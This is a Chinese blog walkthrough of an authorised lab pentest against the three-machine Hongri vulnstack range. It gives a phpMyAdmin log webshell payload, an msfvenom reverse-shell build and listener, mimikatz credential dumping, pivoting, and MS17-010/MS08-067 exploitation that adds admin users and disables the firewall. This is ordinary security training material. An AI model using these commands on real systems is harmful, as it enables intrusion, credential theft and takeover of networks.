很久之前放到收藏夹里的红日靶机,之前总想着汇总一下打一打,但是硬盘没有太大空间就没有去下载搭建(其实就是懒),最近写毕设的过程中无聊换换脑子来打一打。
靶场下载地址
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
靶机配置
靶机有三台。
Win7:内 192.168.52.143 外 192.168.31.245
Win Server 08:192.168.52.138
Win Server 03:192.168.52.141
本机Mac(攻击机):192.168.31.222
三台机器密码都是 hongrisec@2019
Win Server 08登陆以后强制要求修改密码
密码更改为 qwertyuiop123.
在win7上测试一下,能ping通Mac和Windows2003、Windows Server 2008
Mac无法ping通win7,因为win7开了防火墙,更无法ping通内网中的2003和2008;
开启win7的phpstudy,我们开始外网渗透。
外网渗透
nmap扫一下看看 win7开放了哪些端口。
直接访问80 发现是phpstudy探针
暴露了网站的绝对路径为C:/phpStudy/WWW
dirsearch扫描网站目录看看,这里用我自己扫描器试试。
扫到了phpmyadmin。
phpmyadmin是可以getshell的
phpmyadmin写shell
访问phpmyadmin 弱口令 root root登录之。
通过开启日志写shell,这里简单说一下。
1 | show variables like 'general%'; |
1 | set global general_log = "ON"; |
1 | SELECT '<?php eval($_POST["cmd"]);?>' |
一句话写进去以后蚁剑链接看看
因为是phpstudy是Administrator。
可见是双网卡,还有一个内网网卡为
并且还有域存在。
反弹shell
接下来为了后续内网,准备上线到msf上。生成一个.exe上传到服务器并执行。
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.222 LPORT=4444 -f exe -o msf.exe |
本机Mac进行监听
使用exploit/multi/handler
模块开启msf监听;
1 | use exploit/multi/handler |
getuid查看当前会话权限
getsystem自动尝试提权
未开放3389端口
执行run post/windows/manage/enable_rdp
开启3389端口
开启以后可连接。
密码抓取
首先msf加载mimikatz
load mimikatz
1 | creds_msv 获取密码hash值 |
成功抓取到了登陆密码。
内网渗透
Arp -a查看路由表
可见网段192.168.52.0/24
,还有另外两台主机;
run autoroute -s 192.168.52.0/24
添加录路由;run autoroute -p
查看路由;
设置代理方便访问内网服务。
1 | search socks |
然后修改vim /usr/local/etc/proxychains.conf
的最后一行为socks5 192.168.31.222 1088
测试一下能否顺利访问内网主机
接下来我们就扫一下另外两台主机
192.168.52.138
192.168.52.141
都开启了哪些端口
使用msf自带的 portscan
auxiliary/scanner/portscan/tcp
模块;
1 | use auxiliary/scanner/portscan/tcp |
速度感觉。。有点慢
445和135端口,说明都有SMB服务
使用auxiliary/scanner/smb/smb_version
扫描系统版本进行验证
判断系统版本为03
看到445难免想到经典的17010,来验证一下。
MS17-010
1 | use auxiliary/scanner/smb/smb_ms17_010 |
失败了。百度了一下可以换一个这个模块试试看
auxiliary/admin/smb/ms17_010_command
模块执行命令;
1 | use auxiliary/admin/smb/ms17_010_command |
发现此模块可行。
那就利用此模块我们添加一个管理员组的用户。并开启3389端口
1 | set command net user pocsec zxcvbnm123. /add添加用户; |
添加了无数次本机查看都没有成功,后来发现某大佬写的文章原来是
是因为有密码设置策略,密码不能太简单且不能包含用户名。
密码复杂一点就好了
或者直接exploit/windows/smb/ms17_010_psexec
反弹一个shell过来。
MS08-067
我们用08067去打一下试试看
1 | use exploit/windows/smb/ms08_067_netapi |
至此这台03也被我们拿下。
接下来那台08 也是存在17010,来试试看
接下来和拿2003主机一样的操作,依然可以用auxiliary/admin/smb/ms17_010_command
模块执行命令;
因为开启了防火墙,我们先执行命令set command netsh firewall set opmode mode=disable
关闭防火墙;
然后我们用这个模块exploit/windows/smb/ms17_010_psexec
反弹一个shell过来
注意直接反弹不能成功,先用ms17_010_command
执行关闭防火墙命令,在反弹则成功。
可见三台机器都已经被我们拿到了。
到此结束。
总结
nmap探测端口,获取80端口,dirsearch扫目录发现phpstudy探测界面和phpmyadmin。
弱口令进入phpmyadmin 经典的phpmyadmin日志写webshell。最后上线到msf提权。
后添加路由,查看路由表发现其他两台机器,内网用nmap(这里我上面吗没演示)实际上用nmap验证了一下,发现两台机器存在17010和08067最后使用这两个漏洞打下来这两台主机。
其实自己做的过程中没有用到域渗透的东西,等后续其他靶场多换换姿势学一下。
然后这是官方的做法,比较专业。